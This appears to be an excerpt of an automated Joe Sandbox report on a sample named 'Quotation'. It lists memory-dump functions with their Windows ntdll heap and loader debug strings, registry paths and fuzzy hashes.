                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                              • API String ID: 0-861424205
                                                              • Opcode ID: 782f7c0ba698f9b96be0907f4eba889d8a6b932ab125316e35adc63da7da3c56
                                                              • Instruction ID: ae7330e919b0873017f391a91bb25acb1b0a6fe451238062e2a9350ea7d2572d
                                                              • Opcode Fuzzy Hash: 782f7c0ba698f9b96be0907f4eba889d8a6b932ab125316e35adc63da7da3c56
                                                              • Instruction Fuzzy Hash: 7131447AE023647FFB108A95CC40F9F7778DB56B94F094099FA08AB211D670DE01DBA0
                                                              Function 33E60770 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-4253913091
                                                              • Opcode ID: f036dc79ecb4362725b2f3a2c06b4cdea402cdffe526f6a67b9cb4a8a6a484d3
                                                              • Instruction ID: 275e3f779bedc24b0fe4ee47ab40fb3a0f99afab43e60bdfeee97132167805d4
                                                              • Opcode Fuzzy Hash: f036dc79ecb4362725b2f3a2c06b4cdea402cdffe526f6a67b9cb4a8a6a484d3
                                                              • Instruction Fuzzy Hash: 07F1AB74A48705DFEB06CF68C890B6AB7B5FF44348F1481A8E4959B781D738ED81CB90
                                                              Function 33E8C720 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • Failed to reallocate the system dirs string !, xrefs: 33EC82D7
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 33EC82E8
                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 33EC82DE
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 3446177414-1783798831
                                                              • Opcode ID: a351abeac1d2f207916bb745291c5ae621ee473d3d50245a6dc2be0e296c07ad
                                                              • Instruction ID: 20b7d8c6e618440141ab3f044ac779e274393834dd55298ceaf30179e336b0f9
                                                              • Opcode Fuzzy Hash: a351abeac1d2f207916bb745291c5ae621ee473d3d50245a6dc2be0e296c07ad
                                                              • Instruction Fuzzy Hash: 2F4121B5915310AFD710EB74CA40B4BB7E8EF49B54F84492AF988EB290EB75D801CBD1
                                                              Function 33ED4755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 33ED4899
                                                              • LdrpCheckRedirection, xrefs: 33ED488F
                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 33ED4888
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                              • API String ID: 3446177414-3154609507
                                                              • Opcode ID: a3f67bb0e74e4bce25bbf43760db1dc315bf0c590379571be881543f21b44e4f
                                                              • Instruction ID: 60c0d2e7e5e2589f0294c71a94bf7e4d123137ee2add7520e5692f933c9998cc
                                                              • Opcode Fuzzy Hash: a3f67bb0e74e4bce25bbf43760db1dc315bf0c590379571be881543f21b44e4f
                                                              • Instruction Fuzzy Hash: C241C17BA043508FDB11DF58C940A56BBF9AB69694F090559FC88E7211DF30E882CF81
                                                              Function 33F2B16B Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: 1f041a18ce3b790d559d9e595a8bd7fcf746cce2e9d2cb27d83b5345008d705a
                                                              • Instruction ID: 8b4c87ab131d998a2a4a48330a0be69256270826634fa00145310904389a223d
                                                              • Opcode Fuzzy Hash: 1f041a18ce3b790d559d9e595a8bd7fcf746cce2e9d2cb27d83b5345008d705a
                                                              • Instruction Fuzzy Hash: 92F1F77BE006128FDB08CF69C9A167EBFF5AF88200B99456DD856DB380D634ED41CB90
                                                              Function 33F011A4 Relevance: 6.4, Strings: 5, Instructions: 113COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: This is located in the %s field of the heap header.$ -3`$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                              • API String ID: 2994545307-1487992068
                                                              • Opcode ID: 4f851bb8fb0d1886dd085db49104985cfd3b0bbfe9b0032f42030440f22e1394
                                                              • Instruction ID: d103b814ef21b6bd6eb7e0623220b18247593ffa0b767a4d07fb820efcd6be37
                                                              • Opcode Fuzzy Hash: 4f851bb8fb0d1886dd085db49104985cfd3b0bbfe9b0032f42030440f22e1394
                                                              • Instruction Fuzzy Hash: DF31F03A521211EFE700EBACC881F9677E9EF08760F980859F451DB691EA70ED80DE64
                                                              Function 33E476B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                              • API String ID: 0-3061284088
                                                              • Opcode ID: d26e1599716870dffe3d5e42c3635e3852d11bdf4c06795bb7b523edc74aa323
                                                              • Instruction ID: 4816365d64402b98b016ac909c87b21d484cade851a8cda02ddb34ed11e5cb45
                                                              • Opcode Fuzzy Hash: d26e1599716870dffe3d5e42c3635e3852d11bdf4c06795bb7b523edc74aa323
                                                              • Instruction Fuzzy Hash: C2014736429782EEE315A368F419F52BBF4DB46770F28408AF1609BA92CAA4DCC0D560
                                                              Function 33E670C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                              • API String ID: 0-3178619729
                                                              • Opcode ID: 09ef9538a0ea6bc7f6e336241fe32e588525418ab9e7dd8a37b71a14f303fc46
                                                              • Instruction ID: c870075f82706424d7e24b8cb0f6b5c333b7326b7104e4f816a86cccaa2d7352
                                                              • Opcode Fuzzy Hash: 09ef9538a0ea6bc7f6e336241fe32e588525418ab9e7dd8a37b71a14f303fc46
                                                              • Instruction Fuzzy Hash: 6413AF74A40755CFEB14CF68C8907A9BBF1FF49308F5881A9E899AB381D734A945CF90
                                                              Function 33E5B6C0 Relevance: 5.3, Strings: 4, Instructions: 303COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI$\U3
                                                              • API String ID: 0-3619838710
                                                              • Opcode ID: aec6decbcdcf14dc5a217e570805cfd59ec302e9f2bf5d7eb2ed17dac3b2faca
                                                              • Instruction ID: 17a85bc957e29baa8c594935954d0a5f3cbe1845ade640d96d925837b9debe7f
                                                              • Opcode Fuzzy Hash: aec6decbcdcf14dc5a217e570805cfd59ec302e9f2bf5d7eb2ed17dac3b2faca
                                                              • Instruction Fuzzy Hash: 5BB1BB79E187069FEB16CF68C981B9DB7B6BF44788F284529E851EB780D770E840CB41
                                                              Function 33E5A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                              • API String ID: 0-379654539
                                                              • Opcode ID: 2a53213a6c9fb943893700b8aec56d9e87219f5790dc26585c8d5cc7fdf5d9f4
                                                              • Instruction ID: b601f5548ea061eb3cb75a2449005f15ea510007007b63d05d66c72a3e73c9bb
                                                              • Opcode Fuzzy Hash: 2a53213a6c9fb943893700b8aec56d9e87219f5790dc26585c8d5cc7fdf5d9f4
                                                              • Instruction Fuzzy Hash: B8C18CB4508386CFEB12CF58C140B6AB7F4BF88748F04496AF995DB250EB35C949CB92
                                                              Function 33E8273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • .Local, xrefs: 33E828D8
                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 33EC21D9, 33EC22B1
                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 33EC22B6
                                                              • SXS: %s() passed the empty activation context, xrefs: 33EC21DE
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                              • API String ID: 0-1239276146
                                                              • Opcode ID: 0d59b126c572d4c90ddae0c52380428cf102a15b0f1a0a318cf6abc5893148fc
                                                              • Instruction ID: af067560f1caaf23a1c75b047283840e6dd0dce91a4d01fb61c84434f8028d36
                                                              • Opcode Fuzzy Hash: 0d59b126c572d4c90ddae0c52380428cf102a15b0f1a0a318cf6abc5893148fc
                                                              • Instruction Fuzzy Hash: 54A19C79D013299FDB24CF64C884B99B3B5BF58758F1441EAE848AB361D7319E81CF90
                                                              Function 33E4F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                              • API String ID: 2994545307-2586055223
                                                              • Opcode ID: 758b9c7d7c890eccad1d9c17e71996b8af84db64af89d49ae0ffc7dfb8f71569
                                                              • Instruction ID: d99fb3f3cfc21956b1b95e29f5a0586477314204d1f2d7d6101a034a82e28f69
                                                              • Opcode Fuzzy Hash: 758b9c7d7c890eccad1d9c17e71996b8af84db64af89d49ae0ffc7dfb8f71569
                                                              • Instruction Fuzzy Hash: E8613776A04744AFE311CB28E944F6777F8EF84B58F080558F9948B6A1D734E845CB61
                                                              Function 33E49148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                              • API String ID: 2994545307-1391187441
                                                              • Opcode ID: 983ed4a6db0bf6f02c50ee48bcd8df09637e1419a9c00bc8cabb9caf35bccec1
                                                              • Instruction ID: f8505e45aaa66705d9535c2aac5fda0095c9c7ab5c21242392f80c245ff08cd4
                                                              • Opcode Fuzzy Hash: 983ed4a6db0bf6f02c50ee48bcd8df09637e1419a9c00bc8cabb9caf35bccec1
                                                              • Instruction Fuzzy Hash: D031E136A11219EFDB01CB99DC84F9ABBF8EF49760F154091F864AB291DB70ED40CB60
                                                              Function 33E91270 Relevance: 5.1, Strings: 4, Instructions: 97COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$BuildLabEx$E3$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                              • API String ID: 0-472099806
                                                              • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                              • Instruction ID: 40ac439f859a29fb7791f4aa524696341a5619033b13c29f7875f8e88e59f5b2
                                                              • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                              • Instruction Fuzzy Hash: 3631AD76D1071CABEB11DF95CD40EDEBBBDEB84750F014025F914AB6A0E7389E058BA0
                                                              Function 33E57152 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: 88a28a63f8a8fc0db3a6e2a402135902d27a83bafcd1c210aeb80df2e59142af
                                                              • Instruction ID: ef04ca4cfb3106c2157011ff37c6688c8833c4a585ab874e672a0ed4d168d148
                                                              • Opcode Fuzzy Hash: 88a28a63f8a8fc0db3a6e2a402135902d27a83bafcd1c210aeb80df2e59142af
                                                              • Instruction Fuzzy Hash: 9951FE79E04715EFFB06CB64C944BAEBBB8BF44369F144029F542A7690DB70D921DB80
                                                              Function 33ED368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                              • API String ID: 0-2391371766
                                                              • Opcode ID: 3dee1f70d7bdee31f2a5634479320fad2b710822a27c9bb7aa80f35bffc59db1
                                                              • Instruction ID: 4052c0881ff1575ede950e496878671732c4d23efc3b8624a1c22936b07707bb
                                                              • Opcode Fuzzy Hash: 3dee1f70d7bdee31f2a5634479320fad2b710822a27c9bb7aa80f35bffc59db1
                                                              • Instruction Fuzzy Hash: CDB1CEB6A08345AFE311DF54C880F5BB7F8FB44758F440929FA90AB290D774E806CB92
                                                              Function 33E4A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                              • API String ID: 0-2779062949
                                                              • Opcode ID: 190593837a84b421cdd651749f2e1911124284a116218c85f5d6057708770f95
                                                              • Instruction ID: 9172f0588429c58a0706074f7f9783d5b3a60d57b39fb770231d21e6a65484e8
                                                              • Opcode Fuzzy Hash: 190593837a84b421cdd651749f2e1911124284a116218c85f5d6057708770f95
                                                              • Instruction Fuzzy Hash: 28A1AE76D116289BDB21DF28DC88BDAB7B8EF48714F0401E9E909EB210E7359E84CF54
                                                              Function 33EE36EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                              • API String ID: 0-318774311
                                                              • Opcode ID: ebe62bdb97e2ebe74a8f17965584480c0f4b5f3b33f4be941960bda315582922
                                                              • Instruction ID: 5515111d827e368d8421d764731166b33fe3e874fa3761f40e9b917404b8a754
                                                              • Opcode Fuzzy Hash: ebe62bdb97e2ebe74a8f17965584480c0f4b5f3b33f4be941960bda315582922
                                                              • Instruction Fuzzy Hash: D7818AB5A18340AFE711CB14C880B6BB7E8FF85794F44192DF9809B790EB74D904CB62
                                                              Function 33E8909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %$&$@
                                                              • API String ID: 0-1537733988
                                                              • Opcode ID: 9d78f1fcc0a8fdbd4e2c15c88e4d68c9e90b4599d9c1df652770a7a8041f6854
                                                              • Instruction ID: 4b1ab2bb891de270cd8ad783f2dba68f855bde1378b92e6ecd9c8eff710e2453
                                                              • Opcode Fuzzy Hash: 9d78f1fcc0a8fdbd4e2c15c88e4d68c9e90b4599d9c1df652770a7a8041f6854
                                                              • Instruction Fuzzy Hash: F8719C74E083419FE340CF24D980A1FBBE9BF84B58F548A1DF4A99B691D730D909CB92
                                                              Function 33F2B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • TargetNtPath, xrefs: 33F2B82F
                                                              • GlobalizationUserSettings, xrefs: 33F2B834
                                                              • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 33F2B82A
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                              • API String ID: 0-505981995
                                                              • Opcode ID: 6d4c85b5723557ec348590b1496ec5324128b9f4e8f05419e112408fd7a3a5ab
                                                              • Instruction ID: 59c27b5d21457bcbc16d4b9b9cc17deb2caff32e3522487b0b232138f7892df1
                                                              • Opcode Fuzzy Hash: 6d4c85b5723557ec348590b1496ec5324128b9f4e8f05419e112408fd7a3a5ab
                                                              • Instruction Fuzzy Hash: F461AF76D41229EFDB20DB55CC88B9ABBB8AF14750F8105E5E908E7290CB349E84CF90
                                                              Function 33E4F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 33EAE6C6
                                                              • HEAP[%wZ]: , xrefs: 33EAE6A6
                                                              • HEAP: , xrefs: 33EAE6B3
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
